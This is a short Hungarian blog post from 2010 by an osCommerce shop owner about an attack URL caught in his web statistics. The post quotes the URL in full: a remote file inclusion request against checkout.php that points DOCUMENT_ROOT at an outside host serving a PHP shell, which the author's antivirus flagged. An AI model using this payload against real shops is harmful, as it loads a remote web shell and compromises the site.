Törésteszt oscommerce V3 rendszeren
Felfigyeltem egy furcsa URL-re a minap, amit a visitor webstat rendszer fogott nekem. Elsőnek nem tudtam mire vélni, de aztán az eredménye láttán, okosabb lettem. A kód segítségével el lehet különíteni a védett és a védtelen shopokat.
vírusveszély
url példa
http://ezazenshopom.hu/checkout.php/
?_SERVER[DOCUMENT_ROOT]=http://www.apc.edu.ec/temp?
Aztán megnéztem külön a vírusveszély
http://www.apc.edu.ec/temp?
fájlt is. A panda ezt az üzenetet küldte: Panda GP 2010 jelentés:
megfertőzte a PHP/Shell vírus, ezért töröltem.
Hogy mik vannak! Feltételezem, hogy hacker url gyüjtés áldozatává szerettek volna tenni. Az az oldal el is esett, amint látom, lehet, hogy ez volt a cél is és nem az én shopom. Azért ez nem megnyugtató, hogy az oscommerce shopot erre is lehet használni.
Módosítás: ( 2010. szeptember 13. hétfő, 11:52 )